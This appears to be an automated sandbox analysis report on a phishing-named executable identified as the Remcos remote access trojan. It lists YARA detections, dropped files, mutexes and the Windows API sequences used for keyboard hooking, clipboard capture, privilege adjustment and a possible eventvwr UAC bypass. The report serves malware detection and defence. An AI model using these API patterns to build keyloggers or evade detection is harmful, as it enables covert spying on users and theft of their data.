            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00409340 SetWindowsHookExA 0000000D,0040932C,0000000014_2_00409340
            Installs a global keyboard hook
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Purchase Inquiry_002.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040A65A
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,14_2_00414EC1
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040A65A
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,14_2_00409468

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.1359604043.0000000001237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 7180, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Purchase Inquiry_002.exe PID: 8184, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 1412, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: xASiLfzXONGIW.exe PID: 6124, type: MEMORYSTR

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Contains functionalty to change the wallpaper
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0041A76C SystemParametersInfoW,14_2_0041A76C

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: Purchase Inquiry_002.exe PID: 7180, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: xASiLfzXONGIW.exe PID: 1412, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: xASiLfzXONGIW.exe PID: 6124, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Purchase Inquiry_002.exe
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,14_2_00414DB4
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 0_2_0281D57C0_2_0281D57C
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 0_2_06D834B80_2_06D834B8
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 0_2_06D821060_2_06D82106
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 0_2_06D866780_2_06D86678
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 0_2_06D866690_2_06D86669
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 0_2_06D8B6060_2_06D8B606
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 0_2_06D8F7480_2_06D8F748
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 0_2_06D834A80_2_06D834A8
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 0_2_06D8F3100_2_06D8F310
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 0_2_06D8FB800_2_06D8FB80
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 0_2_06D963000_2_06D96300
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeCode function: 0_2_06D905D80_2_06D905D8
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 10_2_013ED57C10_2_013ED57C
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 10_2_073534B810_2_073534B8
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 10_2_0735210610_2_07352106
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 10_2_0735F74810_2_0735F748
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 10_2_0735667810_2_07356678
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 10_2_0735666910_2_07356669
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 10_2_073534A810_2_073534A8
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 10_2_0735F31010_2_0735F310
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 10_2_0735EED810_2_0735EED8
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 10_2_0735FB8010_2_0735FB80
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 10_2_0742556010_2_07425560
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 10_2_074205D810_2_074205D8
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0042515214_2_00425152
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0043528614_2_00435286
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004513D414_2_004513D4
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0045050B14_2_0045050B
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0043651014_2_00436510
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004316FB14_2_004316FB
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0043569E14_2_0043569E
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0044370014_2_00443700
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004257FB14_2_004257FB
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_004128E314_2_004128E3
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0042596414_2_00425964
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0041B91714_2_0041B917
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0043D9CC14_2_0043D9CC
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00435AD314_2_00435AD3
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00424BC314_2_00424BC3
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0043DBFB14_2_0043DBFB
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0044ABA914_2_0044ABA9
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00433C0B14_2_00433C0B
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00434D8A14_2_00434D8A
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0043DE2A14_2_0043DE2A
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0041CEAF14_2_0041CEAF
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00435F0814_2_00435F08
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: String function: 00402073 appears 51 times
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: String function: 00432B90 appears 53 times
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: String function: 00432525 appears 41 times
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1341190098.0000000002831000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1346439746.0000000006F30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1338186322.0000000000B6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exe, 00000000.00000000.1285877304.0000000000442000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezJGj.exeP vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1345811797.0000000006C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1346068741.0000000006CB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exeBinary or memory string: OriginalFilenamezJGj.exeP vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: Purchase Inquiry_002.exe PID: 7180, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: xASiLfzXONGIW.exe PID: 1412, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: xASiLfzXONGIW.exe PID: 6124, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Purchase Inquiry_002.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: xASiLfzXONGIW.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, oAHMyelsBlebo17c9D.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, oAHMyelsBlebo17c9D.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, oAHMyelsBlebo17c9D.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, T4r8SDCIv33WlslpT4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, oAHMyelsBlebo17c9D.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, oAHMyelsBlebo17c9D.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, oAHMyelsBlebo17c9D.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, T4r8SDCIv33WlslpT4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@19/17@12/2
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,14_2_00415C90
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,14_2_0040E2E7
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,14_2_00419493
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeCode function: 14_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_00418A00
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeFile created: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exeMutant created: \Sessions\1\BaseNamedObjects\gig-1IH5DX
